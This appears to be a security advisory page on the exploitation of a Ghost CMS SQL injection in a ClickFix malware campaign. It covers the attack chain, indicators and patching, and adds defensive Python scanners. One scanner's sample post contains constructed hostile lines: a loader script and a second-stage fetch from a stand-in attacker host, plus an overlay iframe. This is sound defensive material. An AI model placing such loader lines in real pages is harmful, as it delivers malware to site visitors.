Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
A critical Ghost CMS SQL injection (CVE-2026-26980) is being exploited in a large-scale ClickFix campaign, impacting 700+ domains including Harvard, Oxford, Auburn, and DuckDuckGo. The flaw allows unauthenticated access to read database data and steal admin API keys, enabling attackers to inject malicious JavaScript into articles. The attack chain uses stolen keys to deploy a loader that fetches second-stage payloads and a fake Cloudflare prompt to deliver the ClickFix lure, with multiple payloads observed. Ghost patched the flaw in version 6.19.1 on February 19, 2026, but many sites have not updated. Admins should upgrade to 6.19.1+, rotate all exposed keys, review IoCs, and maintain 30 days of admin API call logs for retrospective analysis, as operators have shown reinfection and varied payloads.

Ghost CMS SQL Injection Flaw Exploited in Large-Scale ClickFix Campaign
Overview
A critical SQL injection vulnerability in Ghost CMS (CVE-2026-26980) has been leveraged in a wide-reaching campaign to inject malicious JavaScript that triggers ClickFix attack flows. The flaw affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the website database, including admin API keys. The vulnerability was fixed in Ghost CMS version 6.19.1, released on February 19, but many sites did not apply the update in time, leaving them exposed.
Scope and Impact
- The campaign was identified by XLab threat intelligence researchers at Qianxin (China). It impacted more than 700 domains across diverse sectors, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
- Notable targets reported as compromised include Harvard University, Oxford University, Auburn University, and DuckDuckGo.
- The exposed admin API keys provided elevated access to users, articles, and themes, enabling attackers to modify article pages and inject further payloads.
Attack Chain and Methodology
- Initial exploitation: Attackers used CVE-2026-26980 to read data from Ghost CMS databases and to obtain admin API keys without authentication.
- Privilege escalation: With admin-level access, they injected malicious JavaScript into existing articles.
- Second-stage loading: The injected JavaScript served as a loader that retrieved additional payloads from the attacker’s infrastructure.
- Visitor targeting: A fingerprinting step determined which visitors qualified as targets for the second-stage payloads.
- ClickFix lure: Targeted visitors were presented with a fake Cloudflare prompt loaded in an iframe atop the article page, which contained the ClickFix lure.
- Verification prompt: The ClickFix page instructed victims to verify they were human by pasting a command into the Windows command prompt; this action dropped the payload on the user’s system.
- Payloads observed: A variety of payloads were used, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Phases of the Campaign
- Initial breach and data exfiltration via CVE-2026-26980
- Script injection into article content
- Deployment of a multi-stage loader framework
- User-side verification prompt leading to payload execution
- Post-infection activity and payload variety to establish persistence or further compromise
Compromised Sites and Indicators
- The attacker activity was observed across hundreds of domains, with a focus on high-visibility targets and sensitive institutions.
- IoCs (indicators of compromise) include injected scripts embedded in article pages, altered page metadata, and changes to site assets that align with the loader and second-stage payload infrastructure.
- A thorough review of sites is required to locate injected scripts and remove them, as multiple campaigns have shown reinfection or overlapping payloads after cleanup.
Timeline of Key Events
- Vulnerability details: CVE-2026-26980 affecting Ghost versions 3.24.0 through 6.19.0
- Fix release: Ghost CMS version 6.19.1 released on February 19
- Exploitation observed in the wild: SentinelOne published details on February 27 about CVE-2026-26980 being exploited in attacks
- Campaign discovery: Researchers at XLab/MS teams confirmed the widespread impact and observed multiple attack clusters and variant payloads
- Notable compromised targets: High-profile institutions including Harvard University, Oxford University, Auburn University, and the DuckDuckGo search engine
Technical Details and Artifacts
- Admin API keys: Theft of these keys enabled elevated rights, including manipulation of articles and site configurations
- JavaScript loader: The injected code functions as a lightweight loader for second-stage components
- Second-stage payloads: DLL loaders, JavaScript droppers, and an Electron-based malware sample
- ClickFix infrastructure: The attack relies on a cloaking layer to deliver the final payloads to targeted visitors
Validation and Detection Considerations
- The campaigns show distinct activity clusters, sometimes reinfecting the same domains with new scripts after cleanup
- Clean sites may still harbor remnants or secondary payloads if comprehensive removal is not performed
- A careful comparison of article scripts, admin API usage, and site assets can help identify unauthorized changes and anomalous requests
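One concrete way to carry out the article-script comparison above (and to hunt for the injected-script and iframe indicators listed elsewhere on this page) is to scan each post's HTML for script and iframe elements the theme does not account for. The following is an added example written for this page; it is not code from Ghost, XLab, or SentinelOne. It assumes the operator can export post HTML (for instance from a site export or the Admin API's html field) and knows which hosts the site legitimately loads scripts from; the allowlist, site host and sample posts are constructed.

```python
"""Scan Ghost post HTML for injected <script> and <iframe> artefacts.

Added example for this page; not Ghost's own tooling. The allowlist,
site host and SAMPLE_POSTS below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: hosts the theme legitimately loads scripts from, and the site's own host.
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net", "example-blog.test"}
SITE_HOST = "example-blog.test"


class InjectionScanner(HTMLParser):
    """Collect script and iframe elements that a post body should not contain."""

    def __init__(self, allowed_hosts, site_host):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.site_host = site_host
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            src = attrs.get("src")
            if src is None:
                # Inline script: its body arrives via handle_data below.
                self._in_script = True
            else:
                # Relative src is treated as same-origin; anything off the allowlist is flagged.
                host = urlparse(src).hostname or self.site_host
                if host not in self.allowed_hosts:
                    self.findings.append(("external_script", src))
        elif tag == "iframe":
            # Post bodies rarely need iframes; an overlay "verification" frame is a red flag.
            self.findings.append(("iframe", attrs.get("src", "")))

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as data; keep a short excerpt for the report.
        if self._in_script and data.strip():
            self.findings.append(("inline_script", data.strip()[:80]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def scan_post(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS, site_host=SITE_HOST):
    """Return a list of (kind, detail) findings for one post's HTML."""
    scanner = InjectionScanner(allowed_hosts, site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_posts(posts, allowed_hosts=ALLOWED_SCRIPT_HOSTS, site_host=SITE_HOST):
    """Map post id -> findings, omitting posts with nothing suspicious."""
    report = {}
    for post_id, html in posts.items():
        findings = scan_post(html, allowed_hosts, site_host)
        if findings:
            report[post_id] = findings
    return report


# Constructed sample posts: one clean, one carrying an injected loader, an inline
# second-stage fetch, and a fixed-position overlay frame of the kind used for a fake prompt.
SAMPLE_POSTS = {
    "post-clean": (
        "<p>Release notes</p>"
        '<script src="https://cdn.jsdelivr.net/lib.js"></script>'
        '<script src="/assets/theme.js"></script>'
    ),
    "post-injected": (
        "<p>Release notes</p>"
        '<script src="https://attacker.invalid/loader.js"></script>'
        "<script>fetch('https://attacker.invalid/stage2')</script>"
        '<iframe src="https://attacker.invalid/verify" style="position:fixed;top:0"></iframe>'
    ),
}

if __name__ == "__main__":
    for post_id, findings in scan_posts(SAMPLE_POSTS).items():
        print(post_id)
        for kind, detail in findings:
            print(f"  {kind}: {detail}")
```

Run it against every post in the export, not only recently edited ones: the page notes that operators reinfected cleaned sites, so a full pass after each cleanup is what confirms the removal held. The allowlist should be reviewed against the theme's actual script sources before the scan is trusted, because an overly broad allowlist hides exactly the loader this check is meant to find.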
Automated PenTesting and the Validation Gap
- Automated pentesting tools excel at answering whether an attacker can move laterally through a network, but they may not fully address whether your controls will block threats or whether detection rules will fire
- The broader lesson emphasizes validating multiple surface areas beyond initial access controls to ensure comprehensive defense coverage
- A multi-surface validation approach helps close the gap between initial breach detection and ongoing threat containment
Indicators of Compromise (IoCs) and Response Context
- Injected scripts embedded in article pages
- Unusual admin API activity or unexpected API key usage
- New or altered JavaScript payloads loaded on site pages
- Human-verification prompts presented to visitors that instruct them to paste a command into the Windows command prompt
- Unfamiliar DLL loaders, JavaScript droppers, and Electron-based executables observed in deployments
Notes on Mitigation Context
- The affected Ghost CMS versions are fixed in release 6.19.1; historical advisories and subsequent threat intelligence discussions underscore the importance of applying critical fixes promptly to reduce exposure
- As a takeaway, administrators should review admin API key usage history and rotate credentials where exposure is suspected, and conduct a thorough audit of site scripts and assets
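The two takeaways above, checking whether an installed version falls in the affected range and reviewing admin API usage history, can be scripted. The following is an added example for this page, not Ghost's own tooling or anything from the researchers cited. It encodes the affected range the page states (3.24.0 through 6.19.0, fixed in 6.19.1) and assumes admin API traffic is visible in a reverse-proxy access log in the common nginx combined format, with the modern /ghost/api/admin/ path prefix; the log lines, trusted IP set and the "now" timestamp are constructed.

```python
"""Assess CVE-2026-26980 exposure and review admin API write activity.

Added example for this page; not Ghost's own code. Affected range is taken
from the advisory summary above. LOG_LINES, TRUSTED_IPS and NOW are constructed.
"""
import re
from datetime import datetime, timedelta, timezone

AFFECTED_MIN = (3, 24, 0)
AFFECTED_MAX = (6, 19, 0)
FIXED_IN = (6, 19, 1)


def parse_version(s):
    """Turn 'v6.19.1' or '6.19.1-beta' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", s.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when the version lies in the vulnerable range 3.24.0 .. 6.19.0."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


# nginx combined format: ip ident user [ts] "method path proto" status bytes (constructed sample).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Admin API resources whose modification matters for this campaign (posts, themes, integrations).
ADMIN_WRITE_PATH = re.compile(r"^/ghost/api/admin/(posts|pages|themes|integrations)")
WRITE_METHODS = {"POST", "PUT", "DELETE"}


def parse_log(lines):
    """Yield (ip, timestamp, method, path, status) for every line that matches the format."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unrelated or malformed line
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["method"], m["path"], m["status"]


def review_admin_log(lines, trusted_ips, now, window_days=30):
    """Return successful admin API writes from untrusted IPs inside the retention window."""
    cutoff = now - timedelta(days=window_days)
    findings = []
    for ip, ts, method, path, status in parse_log(lines):
        if ts < cutoff:
            continue
        if (method in WRITE_METHODS and ADMIN_WRITE_PATH.match(path)
                and status.startswith("2") and ip not in trusted_ips):
            findings.append({"ip": ip, "time": ts.isoformat(), "method": method, "path": path})
    return findings


def log_coverage_days(lines, now):
    """Whole days between the oldest log entry and now; the page recommends keeping 30."""
    stamps = [ts for _, ts, _, _, _ in parse_log(lines)]
    if not stamps:
        return 0
    return (now - min(stamps)).days


# Constructed sample: an editor's normal activity from 203.0.113.5, one successful post
# write from an unknown address, one write older than the window, and one failed attempt.
TRUSTED_IPS = {"203.0.113.5"}
NOW = datetime(2026, 3, 13, tzinfo=timezone.utc)
LOG_LINES = [
    '203.0.113.5 - - [10/Mar/2026:14:22:01 +0000] "PUT /ghost/api/admin/posts/64f1/ HTTP/1.1" 200 1823',
    '198.51.100.7 - - [10/Mar/2026:15:02:44 +0000] "PUT /ghost/api/admin/posts/64f2/ HTTP/1.1" 200 2201',
    '203.0.113.5 - - [11/Mar/2026:09:10:00 +0000] "GET /ghost/api/admin/posts/ HTTP/1.1" 200 9901',
    '198.51.100.7 - - [01/Feb/2026:08:00:00 +0000] "POST /ghost/api/admin/posts/ HTTP/1.1" 201 1500',
    '198.51.100.7 - - [12/Mar/2026:03:30:12 +0000] "PUT /ghost/api/admin/posts/64f3/ HTTP/1.1" 401 120',
]

if __name__ == "__main__":
    for v in ("5.80.0", "6.19.0", "6.19.1"):
        print(v, "affected" if is_affected(v) else "not affected")
    print("log coverage (days):", log_coverage_days(LOG_LINES, NOW))
    for f in review_admin_log(LOG_LINES, TRUSTED_IPS, NOW):
        print("unexpected admin write:", f)
```

The IP-based trust set is a stand-in for whatever the site actually uses to distinguish its editors from everyone else; the point of the review is that a successful write to posts or themes from a source the operator cannot account for is the signal to rotate every admin API key, not only the one believed stolen. The coverage check is there because the retrospective review the page recommends is only possible if the log actually reaches back 30 days.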
Closing Context
- The Ghost CMS CVE-2026-26980 incident highlights how a single unauthenticated read vulnerability can cascade into full-page injections, credential compromise, and multi-stage malware delivery
- The combination of vulnerable software, aggressive targeting, and layered payloads demonstrates the importance of timely patching, continuous monitoring, and comprehensive validation across surface areas of a website.


